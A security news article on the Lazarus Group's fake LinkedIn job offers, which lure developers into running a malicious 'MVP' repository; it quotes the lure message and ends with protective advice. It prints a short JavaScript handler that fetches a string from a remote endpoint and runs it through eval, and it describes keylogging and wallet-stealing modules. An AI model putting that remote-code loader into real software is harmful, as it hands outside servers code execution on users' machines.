The North Korea-linked Lazarus Group (aka APT 38) has been targeting organizations through a LinkedIn recruiting scam.
Through this scam, the threat actors behind the Lazarus Group aim to capture credentials and deliver malware.
The operation exploits the trust placed in professional networks.
Researchers at Bitdefender identified that the threat actors use enticing job offers to lure unsuspecting individuals into downloading malicious code.
The Setup: A Tempting Job Offer
The scam begins with an enticing message, often involving opportunities in decentralized cryptocurrency exchanges.
The promise of remote work, part-time flexibility, and attractive compensation can be particularly appealing.
Here is an example of such a message:
Message:
“Hi, Happy new Year! Crypto is alive again! In this opportunity, I’d like to take this opportunity to update DEX platform. The final MVP is already done, and I’m looking to bring in more developers to launch our first product by May this year. I truly value your expertise and would like to invite you to discuss this project with us as a React/front-end developer. This position is remote and can be full/part-time if hired. I’d like to offer compensation in the form of tokens or very flexible salary of $85-$110/hr. Looking forward to seeing you in our Project. Thanks,”
Once interest is expressed, the scammer requests a CV or a link to a personal GitHub repository. These requests seem innocent but can be used to harvest personal data or to lend the interaction legitimacy. The fake hiring process then moves through the following stages:
- CV Review
- Skill Test and Technical Interview
- Compensation Meeting with CEO
After receiving the requested information, the scammer shares a repository containing the “minimum viable product” (MVP) of the project. The repository includes a document with questions that can only be answered by running the demo, which pressures the candidate into executing the code.
// Example of malicious code execution
// Get Cookie
const axios = require('axios'); // HTTP client used to fetch the payload
// asyncErrorHandler is an Express-style wrapper defined elsewhere in the repository
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
    // Fetch a JSON document from an attacker-controlled endpoint
    const rs = await axios.get('https://api.example.com/cookie');
    // Execute whatever string the server returned as JavaScript
    eval(rs.data.cookie);
});
The code appears harmless at first glance but is heavily obfuscated and dynamically loads malicious code from a third-party endpoint.
The malware is a cross-platform info-stealer capable of targeting Windows, macOS, and Linux.
It specifically targets popular cryptocurrency wallets by identifying browser extensions with specific IDs, such as MetaMask, BNB Chain Wallet, and others.
Once deployed, the malware collects important files related to these extensions, browser login data, and exfiltrates this information to a malicious IP address.
The malware downloads and executes a Python script named main99_65.py, which sets the stage for additional malicious activities.
This script decompresses and decodes itself recursively, revealing a hidden script that downloads three Python modules:
- mlip.py: Hooks keyboard events, monitors clipboard changes for crypto-related data, and sends stolen data to a remote server.
- pay.py: Reports system/network info, exfiltrates valuable files, and maintains a persistent communication channel.
- bow.py: Extracts sensitive browser data and runs the Tsunami Injector script.
The objectives of the Lazarus Group extend beyond personal data theft, aiming to compromise sensitive corporate information.
To protect yourself from such scams, watch for red flags: repositories without proper documentation or contribution history, and poor communication marked by frequent spelling errors and a reluctance to provide alternative contact methods.
Best practices include never executing unverified code, verifying the authenticity of job offers, and scrutinizing unsolicited messages and requests for personal information with a cautious mindset.